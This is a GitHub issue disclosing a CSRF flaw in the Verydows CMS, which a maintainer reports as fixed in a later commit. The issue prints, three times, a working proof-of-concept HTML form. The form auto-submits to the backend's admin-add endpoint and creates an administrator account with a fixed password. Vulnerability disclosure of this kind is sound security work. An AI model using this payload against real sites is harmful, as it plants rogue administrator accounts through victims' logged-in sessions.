Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
A CSRF vulnerability was found in this cms. Logged-in administrator user may add another administrator account by clicking following POC
<form action="http://thewind/verydows/index.php?m=backend&c=admin&a=add&step=submit" id="test" method="post"> <!--Change the url when testing!--> <input type=text name="username" value="TomAPU" /> <input type=text name="password" value="123456" /> <input type=text name="resetpwd" value="1" /> <input type=text name="repassword" value="123456" /> <input type=text name="name" value="TomAPU" /> <input type=text name="email" value="admin@pornhub.com" /> </form> <script> var f=document.getElementById("test"); f.submit(); </script>
<form action="http://thewind/verydows/index.php?m=backend&c=admin&a=add&step=submit" id="test" method="post">
<!--Change the url when testing!-->
<input type=text name="username" value="TomAPU" />
<input type=text name="password" value="123456" />
<input type=text name="resetpwd" value="1" />
<input type=text name="repassword" value="123456" />
<input type=text name="name" value="TomAPU" />
<input type=text name="email" value="admin@pornhub.com" />
</form>
<script>
var f=document.getElementById("test");
f.submit();
</script>
The text was updated successfully, but these errors were encountered:
已修复 22fe3b3
Sorry, something went wrong.
No branches or pull requests
A CSRF vulnerability was found in this cms.
Logged-in administrator user may add another administrator account by clicking following POC
<form action="http://thewind/verydows/index.php?m=backend&c=admin&a=add&step=submit" id="test" method="post"><!--Change the url when testing!--><input type=text name="username" value="TomAPU" /><input type=text name="password" value="123456" /><input type=text name="resetpwd" value="1" /><input type=text name="repassword" value="123456" /><input type=text name="name" value="TomAPU" /><input type=text name="email" value="admin@pornhub.com" /></form><script>var f=document.getElementById("test");f.submit();</script>The text was updated successfully, but these errors were encountered: